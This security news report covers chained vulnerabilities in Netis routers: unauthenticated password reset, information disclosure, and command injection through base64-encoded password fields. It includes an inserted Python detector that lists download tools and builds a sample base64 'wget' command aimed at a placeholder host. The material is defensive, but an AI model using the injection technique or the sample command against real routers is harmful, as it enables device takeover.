
Netis routers vulnerable to chained authentication bypass, RCE flaws

Several Netis router models were found to have firmware vulnerabilities that could be chained together for sensitive information disclosure, authentication bypass and remote code execution (RCE).

The three vulnerabilities affect WiFi and 4G Netis home router models including the NX10, NC65, NC63, NC21 and MW5360. The flaws were discovered by h00die-gr3y on GitHub, who published an analysis and indicated that no fixes were available as they never received a response from Netis about their vulnerability report.

SC Media attempted to reach out to Netis to ask whether fixes would be made available and did not receive a response by the time of publication.

Flawed password reset systems enable authentication bypass, command injection

The RCE vulnerability tracked as CVE-2024-48456 could enable an authenticated remote attacker to hijack the admin password reset feature in order to run code fetched from an attacker-controlled server.

While achieving RCE on an affected Netis router requires administrator access, this access can be achieved by chaining CVE-2024-48456 with the flaw tracked as CVE-2024-48457, which enables an unauthenticated attacker to remotely set the router’s admin password.

H00die-gr3y found that the POST request used for initial setup of the router, WiFi password and admin password can be repeated at any time, meaning an attacker can send their own request to remotely reset the router and set the admin password to anything they want.

Now with admin access to the router, the attacker can then exploit CVE-2024-48456 by using the router’s web interface to initiate a new admin password reset. If the attacker can intercept the POST request sent to the router for the password reset, they can replace the “password” and “new_pwd_confirm” fields with a base64-encoded wget command to retrieve a file from their own external server and relay the modified request back to the router to achieve RCE.
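A defensive check for the tampered password-reset request described above, added here as an example and not taken from h00die-gr3y's research or from Netis firmware: it decodes the "password" and "new_pwd_confirm" fields and flags values that look like commands rather than passwords. The form-encoded body layout, the pattern lists, the helper names and the sample values are assumptions constructed for illustration.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlencode

# Field names come from the article; patterns and samples are assumptions.
PASSWORD_FIELDS = ("password", "new_pwd_confirm")
COMMAND_TOKENS = re.compile(r"\b(wget|curl|tftp|busybox)\b", re.IGNORECASE)
SHELL_META = re.compile(r"[;&|`\n]|\$\(")


def decode_field(value):
    """Return the base64-decoded text, or the raw value if it is not base64."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return value


def inspect_body(body):
    """Return (field, reason) findings for one form-encoded POST body."""
    findings = []
    fields = parse_qs(body, keep_blank_values=True)
    for name in PASSWORD_FIELDS:
        for raw in fields.get(name, []):
            # Check both forms so an unencoded value is not missed.
            texts = {raw, decode_field(raw)}
            if any(COMMAND_TOKENS.search(t) for t in texts):
                findings.append((name, "command token"))
            elif any(SHELL_META.search(t) for t in texts):
                findings.append((name, "shell metacharacter"))
    return findings


def make_body(value):
    """Build a constructed sample body with both fields set to base64(value)."""
    encoded = base64.b64encode(value.encode()).decode()
    return urlencode({name: encoded for name in PASSWORD_FIELDS})


# Constructed samples, not captured traffic (192.0.2.10 is a documentation IP).
BENIGN = make_body("Correct-Horse-9")
SUSPECT = make_body("wget http://192.0.2.10/file")

if __name__ == "__main__":
    for label, body in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, inspect_body(body))
```

A check like this belongs on a proxy or gateway in front of the router's admin interface, since the firmware itself has no fix available.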

An additional vulnerability, tracked as CVE-2024-48455, allows an unauthenticated remote attacker to send a simple POST request to the router to retrieve potentially sensitive information about the device that could be used to inform future attacks.

A full list of affected firmware versions is available in h00die-gr3y’s research notes. The vulnerabilities were first discovered in May 2024 and were published in the NIST National Vulnerability Database on Monday.

Routers, such as those sold by Netis, can be hijacked for use in botnets to launch wider-scale cyberattacks; for example, Netis devices, along with routers by D-Link and Zyxel, were used in a Mirai botnet-based DDoS campaign in October 2023.

In 2014, Netis routers were impacted by a backdoor that could enable any device with an externally accessible IP address to be targeted by remote attackers.
